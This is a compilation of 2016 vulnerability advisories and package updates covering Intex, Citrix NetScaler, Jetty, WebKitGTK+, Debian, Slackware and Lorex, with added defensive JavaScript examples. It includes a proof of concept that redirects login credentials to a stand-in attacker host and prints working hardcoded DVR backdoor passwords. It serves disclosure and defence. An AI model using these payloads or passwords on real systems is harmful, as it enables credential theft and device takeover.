Multiple Vulnerabilities in Intex Wireless N150 Easy Setup Router
Intex Wireless N150 Easy Setup Router Vulnerabilities

1. Overview

Intex Wireless N150 Easy Setup Router, firmware version V5.07.51_en_INX01, uses default credentials and is vulnerable to cross-site request forgery, cleartext transmission of sensitive information and other attacks.

2. Vulnerabilities

1. Credentials Management
2. Cleartext Transmission of Sensitive Information
3. Auto-Complete is enabled
4. Cross-Site Request Forgery
5. Improper Neutralization of Input during Web Page Generation

3. Vulnerabilities Description

The purpose of this paper is to outline the security measures taken by Intex to prevent such attacks in their home routing products, what those measures accomplish, and where they fall short. Following are the details of the vulnerabilities found during the security assessment.

(1) Credentials Management

Intex uses a default password of "admin" for the admin account. An attacker on the local area network can gain privileged access to the web management interface, or leverage the default credentials in remote attacks such as cross-site request forgery.

(2) Cleartext Transmission of Sensitive Information

The device transmits sensitive or security-critical data in cleartext over a communication channel that can be sniffed by unauthorized actors.

(3) Auto-Complete is enabled

The web form contains password or other sensitive text fields for which the browser auto-complete feature is enabled. Auto-complete stores completed form fields and passwords locally in the browser so that they are filled in automatically when the user visits the site again. Sensitive data and passwords can be stolen if the user's system is compromised.

Screenshot: https://www.dropbox.com/s/3hhdyp6iisw1kg6/1.png?dl=0

(4) Cross-Site Request Forgery (CSRF)

The Intex web management interface contains a global cross-site request forgery (CSRF) vulnerability. An attacker can perform actions with the same permissions as a victim user, provided the victim has an active session and is induced to trigger the malicious request. Note that in combination with the default credentials, an attacker can establish an active session as part of the attack and therefore does not require a victim to be logged in.

Screenshot: https://www.dropbox.com/s/rh5b925ua0g66s8/2.png?dl=0

(5) Improper Neutralization of Input during Web Page Generation

The router does not properly sanitize input values. This allows a malicious user to inject arbitrary JavaScript. It results in a failure of the web page to properly display content and corrupts the administrative interface.

Screenshot: https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0

4. Impact

An attacker can obtain credentials and configuration information and gain complete control of affected devices.

5. Solutions

Until these vulnerabilities are addressed by the company, users should consider the following workarounds.

a) Restrict access and use strong passwords

As a general good security practice, only allow trusted hosts to connect to the LAN. Use strong passwords for WiFi and for the web management interface. Strong passwords help prevent blind guessing attempts that would establish sessions for CSRF attacks. LAN hosts should not browse the Internet while the web management interface has an active session in a browser tab.
[CVE-2016-4945] Login Form Hijacking Vulnerability in Citrix NetScaler Gateway
PERSICON Security Advisory
==========================

Title:              Login Form Hijacking vulnerability
Product:            Citrix NetScaler Gateway
Vulnerable Version: 11.0 Build 64.35
Fixed Version:      11.0 Build 66.11
CVE-ID:             CVE-2016-4945
Impact:             medium
found:              2016-04-07
by:                 Dr. Daniel Schliebner
                    http://www.persicon.com

Vendor Description:
-------------------
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations and things are securely connected and accessible to make the extraordinary possible. Its technology makes the world's apps and data secure and easy to access, empowering people to work anywhere and at any time. Citrix provides a complete and integrated portfolio of Workspace-as-a-Service, application delivery, virtualization, mobility, network delivery and file sharing solutions that enables IT to ensure critical systems are securely available to users via the cloud or on-premise and across any device or platform. With annual revenue in 2015 of $3.28 billion, Citrix solutions are in use by more than 400,000 organizations and over 100 million users globally." (https://www.citrix.com/about.html)

Vulnerability Description:
--------------------------
The login page of the Citrix NetScaler Gateway web frontend is vulnerable to a DOM-based Cross-Site Scripting (XSS) vulnerability due to improper sanitization of the content of the "NSC_TMAC" cookie. The vulnerability is located in the file /vpn/js/gateway_login_form_view.js, in which the cookie's content is, if set, written to the DOM via JavaScript. This is done in the following excerpt:

    var cookie_action = ns_getcookie("NSC_TMAC");
    var action_url = '/cgi/login';
    if (cookie_action) {
        // the unvalidated cookie value becomes the login form's action URL
        action_url = cookie_action;
        UnsetCookie("NSC_TMAC");
    }

This vulnerability can be exploited by an unauthenticated remote attacker by forging the destination address of the login form in order to receive a victim's login credentials. This can be achieved, for example, by using another XSS vulnerability on the company's web page.

Proof of concept:
-----------------
Assume this vulnerability resides on https://my-foobar-company.com/vpn/. Assume further that an attacker is able to set a cookie on a victim's client via some other attack vector, e.g. another XSS vulnerability. The attacker first needs to execute (e.g. via that XSS) the following code on the client:

    document.cookie = 'NSC_TMAC=https://attack.ers/receive/;' +
                      ' domain=.my-foobar-company.com';
    window.location.href = 'https://my-foobar-company.com/vpn/';

As a consequence, the NetScaler Gateway login form has the URL "https://attack.ers/receive/" as the value of its "action" attribute, and hence the victim sends their credentials to the attacker's host when submitting the form.

Vulnerable / tested versions:
-----------------------------
Citrix NetScaler 11.0 Build 65.31
Citrix NetScaler 11.0 Build 64.34

Vendor contact timeline:
------------------------
2016-04-11: Contacting vendor through sec...@citrix.com
2016-04-11: Vendor response - issue has now the case ID CASE-6597 and will be forwarded for feedback
2016-04-12: Vendor response - issue will be reviewed
2016-04-25: Vendor response - issue will be fixed
2016-05-24: Vendor response - issue is fixed in the upcoming release on 26th May
2016-05-26: Vendor response - issue is fixed in the upcoming release at 5pm PDT on 26th May
2016-05-27: Status update - fix released by vendor
2016-05-27: Coordinated release of the security advisory

Solution:
---------
Remove the use of the cookie content, or sanitize its content properly before writing it to the DOM.

References:
-----------
[1] http://support.citrix.com/article/CTX213313

URL:
----
http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.txt
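The cookie-to-action flow described above, as an added example that is not from the advisory and not Citrix's gateway_login_form_view.js: vulnerableActionUrl models the quoted excerpt (the cookie value is used as-is), and safeActionUrl shows the sanitization the Solution section calls for, accepting a value only when it resolves to a path on the gateway's own origin and returning the default /cgi/login otherwise. The gateway origin, the small cookie parser and the sample cookie strings are assumptions constructed for this example; the real page reads the cookie through ns_getcookie and the browser's document.cookie.

```javascript
// Added example, not code from the PERSICON advisory or from Citrix.
// Models the NSC_TMAC handling in /vpn/js/gateway_login_form_view.js as the
// advisory describes it, and beside it the same-origin check that "sanitize
// its content properly" implies. Origin and cookie strings are constructed.

const DEFAULT_ACTION = '/cgi/login';
// Hypothetical gateway origin, taken from the advisory's own proof of concept.
const GATEWAY_ORIGIN = 'https://my-foobar-company.com';

// Minimal document.cookie-style parser: "name=value; name2=value2".
// Stands in for ns_getcookie(), whose implementation is not on the page.
function getCookie(cookieHeader, name) {
  for (const part of cookieHeader.split(';')) {
    const [key, ...rest] = part.trim().split('=');
    if (key === name) return rest.join('=');
  }
  return null;
}

// Vulnerable behaviour as quoted in the advisory: whatever NSC_TMAC holds
// becomes action_url, so an attacker-set cookie redirects the credentials.
function vulnerableActionUrl(cookieHeader) {
  const cookieAction = getCookie(cookieHeader, 'NSC_TMAC');
  return cookieAction ? cookieAction : DEFAULT_ACTION;
}

// Hardened: resolve the value against the gateway origin and keep it only if
// the resulting origin is the gateway's own. Absolute attacker URLs,
// scheme-relative "//attack.ers/...", "javascript:" and userinfo tricks such as
// "https://my-foobar-company.com@attack.ers/" all resolve elsewhere (or to the
// opaque origin "null") and fall back to the default action.
function safeActionUrl(cookieHeader) {
  const cookieAction = getCookie(cookieHeader, 'NSC_TMAC');
  if (!cookieAction) return DEFAULT_ACTION;
  let resolved;
  try {
    resolved = new URL(cookieAction, GATEWAY_ORIGIN);
  } catch (e) {
    return DEFAULT_ACTION; // unparsable value: never write it to the DOM
  }
  if (resolved.origin !== GATEWAY_ORIGIN) return DEFAULT_ACTION;
  // Emit only the resolved path and query, never the raw cookie string.
  return resolved.pathname + resolved.search;
}

// Stand-alone demonstration with the cookie the proof of concept plants.
const planted = 'NSC_TMAC=https://attack.ers/receive/';
console.log('vulnerable:', vulnerableActionUrl(planted));
console.log('hardened:  ', safeActionUrl(planted));
```

The check is made on the resolved URL object rather than on the string, which is why a prefix test such as "starts with /" would not be enough: "//attack.ers/receive/" starts with a slash and still leaves the origin.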
[slackware-security] php (SSA:2016-148-03)
[slackware-security]  php (SSA:2016-148-03)

New php packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.

Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/php-5.6.22-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and security issues.
  For more information, see:
    http://php.net/ChangeLog-5.php#5.6.22
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.22-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.22-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.22-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.22-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.22-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.22-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 14.0 package:
32c1de91404285e26621694949522eec  php-5.6.22-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
83c69b58d5ce8ca939d2814fbb5d58b2  php-5.6.22-x86_64-1_slack14.0.txz

Slackware 14.1 package:
830e6aa4120da72592086c5292a24147  php-5.6.22-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
13024ab60d13e7a07e29736f170267b2  php-5.6.22-x86_64-1_slack14.1.txz

Slackware -current package:
76e1f1d5eb9324d5aa33068ee85ae895  n/php-5.6.22-i586-1.txz

Slackware x86_64 -current package:
126dacd2be02643c32a815f09ff39f58  n/php-5.6.22-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg php-5.6.22-i486-1_slack14.1.txz

Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majord...@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
[SECURITY] [DSA 3588-1] symfony security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3588-1                   secur...@debian.org
https://www.debian.org/security/                            Luciano Bello
May 29, 2016                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : symfony
CVE ID         : CVE-2016-1902 CVE-2016-4423

Two vulnerabilities were discovered in Symfony, a PHP framework.

CVE-2016-1902

    Lander Brandt discovered that the class SecureRandom might generate
    weak random numbers for cryptographic use under certain settings. If
    the functions random_bytes() or openssl_random_pseudo_bytes() are not
    available, the output of SecureRandom should not be considered secure.

CVE-2016-4423

    Marek Alaksa from Citadelo discovered that it is possible to fill up
    the session storage space by submitting nonexistent, very large
    usernames.

For the stable distribution (jessie), these problems have been fixed in
version 2.3.21+dfsg-4+deb8u3.

For the testing distribution (stretch), these problems have been fixed
in version 2.8.6+dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 2.8.6+dfsg-1.

We recommend that you upgrade your symfony packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[slackware-security] libxml2 (SSA:2016-148-01)
[slackware-security]  libxml2 (SSA:2016-148-01)

New libxml2 packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.

Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and security issues:
  Heap-based buffer underreads due to xmlParseName (CVE-2016-4447).
  Format string vulnerability (CVE-2016-4448).
  Inappropriate fetch of entities content (CVE-2016-4449).
  For more information, see:
    http://xmlsoft.org/news.html
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.9.4-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.9.4-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.9.4-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.9.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.9.4-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 14.0 package:
c498433ae7d6077a9d5245877aa2c06e  libxml2-2.9.4-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c92258a87bb30a6cdce2b5428d640bd5  libxml2-2.9.4-x86_64-1_slack14.0.txz

Slackware 14.1 package:
2b74b913a164a23ad2da10eebf923e46  libxml2-2.9.4-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
e2dee612c7de77822824e43a61414c2c  libxml2-2.9.4-x86_64-1_slack14.1.txz

Slackware -current package:
98d1ede4a347a49f2ad972ac5339b9e6  l/libxml2-2.9.4-i586-1.txz

Slackware x86_64 -current package:
c2d5721aac77b74d7e47a2a8a372d47a  l/libxml2-2.9.4-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg libxml2-2.9.4-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com
[slackware-security] libxslt (SSA:2016-148-02)
[slackware-security]  libxslt (SSA:2016-148-02)

New libxslt packages are available for Slackware 14.0, 14.1, and -current to
fix a security issue.

Here are the details from the Slackware 14.1 ChangeLog:
+--------------------------+
patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and a security issue:
  Fix for type confusion in preprocessing attributes (Daniel Veillard).
  For more information, see:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7995
  (* Security fix *)
+--------------------------+

Where to find the new packages:
+-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxslt-1.1.29-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxslt-1.1.29-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxslt-1.1.29-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxslt-1.1.29-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxslt-1.1.29-x86_64-1.txz

MD5 signatures:
+-------------+

Slackware 14.0 package:
9e81aeb7a44f515dc0d0053395faffea  libxslt-1.1.29-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c1186870f78d1c71eed0cb10effd561a  libxslt-1.1.29-x86_64-1_slack14.0.txz

Slackware 14.1 package:
847723b4e9f68c2a2a97869734b4c7c0  libxslt-1.1.29-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
79eed20e9211c68e94c383e929cc6aa0  libxslt-1.1.29-x86_64-1_slack14.1.txz

Slackware -current package:
40b33089887fe7c5827d6bf901e1cdbf  l/libxslt-1.1.29-i586-1.txz

Slackware x86_64 -current package:
088186d11e38075de6e018f8ae6f7471  l/libxslt-1.1.29-x86_64-1.txz

Installation instructions:
+------------------------+

Upgrade the package as root:
# upgradepkg libxslt-1.1.29-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com
[oCERT 2016-001] Jetty path sanitization issues
Description:

Jetty is a Java HTTP (Web) server and Servlet container.

The Jetty path normalization mechanism suffers from an implementation issue when parsing request URLs. The path normalization logic implemented in the PathResource class and introduced in Jetty versions 9.3.x can be defeated by requesting malicious URLs containing specific escaped characters. Leveraging this weakness, a malicious user can gain access to protected resources (e.g. the WEB-INF and META-INF folders and their contents) and defeat application filters or other security constraints implemented in the servlet configuration.

A workaround to mitigate the issue, using the 'rewrite' module, can alternatively be implemented as follows:

    $ java -jar ../start.jar --module=rewrite etc/backslashalias.xml

or

    $ java -jar ../start.jar --add-to-startd=rewrite
    $ java -jar ../start.jar etc/backslashalias.xml

Workaround file backslashalias.xml contents:

    http://www.eclipse.org/jetty/configure_9_3.dtd;> .*\\.* / 404

Affected version:
Jetty >= 9.3.0, <= 9.3.8

Fixed version:
Jetty >= 9.3.9

Credit:
vulnerability reported by Simon Zuckerbraun of Trend Micro Zero Day Initiative

CVE:
CVE-2016-4800

Timeline:
2016-05-03: vulnerability report received
2016-05-06: contacted maintainer
2016-05-11: patch provided by maintainer
2016-05-13: assigned CVE
2016-05-18: reporter confirms patch
2016-05-20: contacted affected vendors
2016-05-30: advisory release

References:
http://www.eclipse.org/jetty/download.html

Permalink:
http://www.ocert.org/advisories/ocert-2016-001.html

--
Daniele Bianco
Open Source Computer Security Incident Response Team
http://www.ocert.org
GPG Key 0x9544A497
GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D 4AC5 AE75 822E 9544 A497
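An added example, not Jetty's code and not the workaround file itself: a request-path check in JavaScript (Node.js) that does what the advisory's rewrite rule `.*\\.*` does, refusing any request whose path still contains a backslash once percent-decoded, and additionally canonicalises the decoded path and refuses requests that resolve into WEB-INF or META-INF or that climb above the context root. The advisory does not name the exact escape sequence used in the reported attack; the `%5C` (encoded backslash) inputs are constructed from the workaround's regex, and the other request targets, the protected-directory list and the result shape are assumptions of this example.

```javascript
// Added example, not code from Jetty or from the oCERT advisory.
// checkRequestPath() applies, in one place, the three checks a container's
// path normalization has to get right before resource lookup: decode once,
// refuse separators that the filesystem or alias logic might reinterpret,
// and resolve "." / ".." before comparing against protected names.

// Directories the servlet spec reserves; clients must never read them.
const PROTECTED = new Set(['WEB-INF', 'META-INF']);

// Resolve "." and ".." segments by hand so that climbing above the root is
// detected (path.posix.normalize would silently drop a leading ".."). Returns
// the canonical absolute path, or null if the path escapes the context root.
function canonicalize(decodedPath) {
  const out = [];
  for (const seg of decodedPath.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {
      if (out.length === 0) return null; // would climb above the context root
      out.pop();
      continue;
    }
    out.push(seg);
  }
  return '/' + out.join('/');
}

// Returns { ok: true, path } for a target that is safe to hand to resource
// resolution, or { ok: false, reason } when the caller should answer 404,
// which is what the advisory's rewrite rule does for backslashes.
function checkRequestPath(rawTarget) {
  const rawPath = rawTarget.split('?')[0]; // query string plays no part in lookup
  let decoded;
  try {
    decoded = decodeURIComponent(rawPath); // decode exactly once, as the container does
  } catch (e) {
    return { ok: false, reason: 'malformed percent-encoding' };
  }
  // The workaround's rule `.*\\.*`: a backslash anywhere after decoding is refused,
  // because on some filesystems "\" is treated as a separator that "/"-based
  // normalization never examined.
  if (decoded.includes('\\')) return { ok: false, reason: 'backslash in decoded path' };
  if (decoded.includes('\0')) return { ok: false, reason: 'NUL byte in decoded path' };
  if (!decoded.startsWith('/')) return { ok: false, reason: 'path must be absolute' };
  const canonical = canonicalize(decoded);
  if (canonical === null) return { ok: false, reason: 'path escapes context root' };
  // Compare case-insensitively: a case-insensitive filesystem would happily
  // serve /web-inf/web.xml even though the constraint names WEB-INF.
  const hit = canonical.split('/').find(s => PROTECTED.has(s.toUpperCase()));
  if (hit !== undefined) return { ok: false, reason: 'protected directory ' + hit };
  return { ok: true, path: canonical };
}

// Stand-alone demonstration on constructed request targets.
for (const t of ['/WEB-INF%5Cweb.xml', '/%5CWEB-INF/web.xml', '/static/../WEB-INF/web.xml',
                 '/../etc/passwd', '/static/./css/../app.js?v=1']) {
  console.log(t, '->', JSON.stringify(checkRequestPath(t)));
}
```

The decode happens once on purpose: a container decodes the request target a single time, so `%255C` reaches the application as the literal text `%5C` and is not a backslash; decoding twice here would reject inputs the real server would treat as harmless file names, while decoding zero times would let the `%5C` form through.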
WebKitGTK+ Security Advisory WSA-2016-0004
WebKitGTK+ Security Advisory                                 WSA-2016-0004

Date reported   : May 30, 2016
Advisory ID     : WSA-2016-0004
Advisory URL    : http://webkitgtk.org/security/WSA-2016-0004.html
CVE identifiers : CVE-2016-1854, CVE-2016-1856, CVE-2016-1857,
                  CVE-2016-1858, CVE-2016-1859.

Several vulnerabilities were discovered in WebKitGTK+.

CVE-2016-1854
    Versions affected: WebKitGTK+ before 2.12.1.
    Credit to Anonymous working with Trend Micro's Zero Day Initiative.
    WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-1855, CVE-2016-1856, and CVE-2016-1857.

CVE-2016-1856
    Versions affected: WebKitGTK+ before 2.12.1.
    Credit to lokihardt working with Trend Micro's Zero Day Initiative.
    WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-1854, CVE-2016-1855, and CVE-2016-1857.

CVE-2016-1857
    Versions affected: WebKitGTK+ before 2.12.3.
    Credit to Jeonghoon Shin@A.D.D and Liang Chen, Zhen Feng, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative.
    WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-1854, CVE-2016-1855, and CVE-2016-1856.

CVE-2016-1858
    Versions affected: WebKitGTK+ before 2.12.0.
    Credit to Anonymous.
    WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1, improperly tracks taint attributes, which allows remote attackers to obtain sensitive information via a crafted web site.

CVE-2016-1859
    Versions affected: WebKitGTK+ before 2.12.1.
    Credit to Liang Chen, wushi of KeenLab, Tencent working with Trend Micro's Zero Day Initiative.
    The WebKit Canvas implementation in Apple iOS before 9.3.2, Safari before 9.1.1, and tvOS before 9.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

We recommend updating to the latest stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the latest stable releases.

Further information about WebKitGTK+ Security Advisories can be found at:
http://webkitgtk.org/security.html

The WebKitGTK+ team,
May 30, 2016
[SECURITY] [DSA 3589-1] gdk-pixbuf security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3589-1                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
May 30, 2016                          https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : gdk-pixbuf
CVE ID         : CVE-2015-7552 CVE-2015-8875

Several vulnerabilities have been discovered in gdk-pixbuf, a toolkit for
image loading and pixel buffer manipulation. A remote attacker can take
advantage of these flaws to cause a denial-of-service against an
application using gdk-pixbuf (application crash), or potentially, to
execute arbitrary code with the privileges of the user running the
application, if a malformed image is opened.

For the stable distribution (jessie), these problems have been fixed in
version 2.31.1-2+deb8u5.

We recommend that you upgrade your gdk-pixbuf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[SECURITY] Lorex ECO DVR Hard coded password
1. ADVISORY INFORMATION
=======================
Product:        Lorex ECO DVR
Vendor URL:     https://www.lorextechnology.com/
Type:           Hard coded password [CWE-259]
Date found:     2016-05-04
Date published: 2016-05-30
CVE:            -

2. CREDITS
==========
This vulnerability was discovered and researched by Andrew Hofmans.
https://www.andrewhofmans.com

3. VERSIONS AFFECTED
====================
The vulnerability was successfully tested on a Lorex LH162400 DVR, firmware V5.2.0-20141008, using the Lorex Stratus Client and the Lorex ECO Stratus Android app. It may be present on other DVRs that can be accessed via the Lorex Stratus Client and the Lorex ECO Stratus Android app. Affected DVRs likely include the vendors and versions listed explicitly in the code below.

4. INTRODUCTION
===============
"LOREX provides businesses and consumers with professional-grade DIY video surveillance systems and plug and play wireless video monitoring solutions." (from the vendor's homepage)

5. VULNERABILITY DETAILS
========================
Remote access to the device is possible using Lorex's Stratus Client, which is downloadable from the vendor. The user is prompted for IP, username/password and port. DVRs are easily identified on a LAN using normal port scanning and enumeration. The default username and password are admin:00 (from the manufacturer's manual). On first login the admin user is prompted to change the password. No matter what the password is or what it is changed to, the "SuperPassword" grants admin access to the device.

The following proof of concept is found in plaintext in [installation directory]\new-trunk\js\main.js:

    function CheckPassword(){};
    $(function(){
        $("#btn_reboot_ok").click(function(){
            var SuperPassword;
            // backdoor password chosen by DVR hardware type ...
            if(gDvr.nMainType == 0x52530003 ||
               (gDvr.nMainType == 0x52530002 && gDvr.nSubType == 0x50100) ||
               (gDvr.nMainType == 0x5253 && gDvr.nSubType == 0x60300)){
                SuperPassword = "130901";
            }else{
                SuperPassword = "070901";
            }
            // ... and overridden per OEM brand of the client build
            if(lgCls.version == "SWANN"){
                SuperPassword = "479266";
            }else if(lgCls.version == "PROTECTRON"){
                SuperPassword = "Ab9842";
            }
            // either the configured admin password or the hardcoded one is accepted
            if($("#reboot_input").val() == gVar.passwd || $("#reboot_input").val() == SuperPassword){
                MasklayerHide();
                $("#reboot_prompt").css("display","none");
                CheckPassword();
            }
        });
    });

6. RISK
=======
To successfully exploit this vulnerability an attacker must have remote access to the DVR over port 9000. The attacker can use Lorex's Stratus Client with the hardcoded admin password for the specific vendor and model. The vulnerability allows remote attackers full administrative access to the device.

7. SOLUTION
===========
Prevent remote access to port 9000 at the firewall. Segregate the DVR from the normal LAN onto a limited-access internal LAN segment / VLAN.

8. REPORT TIMELINE
==================
2016-05-04: Discovery of the vulnerability
2016-05-05: Informed applicable vendors
2016-05-05: Submitted vulnerability to US-CERT
2016-05-05: Response from US-CERT informing that a similar vulnerability was previously reported and ignored by the vendor. No further attempts will be made.
2016-05-16: Response from Swann
2016-05-30: Advisory released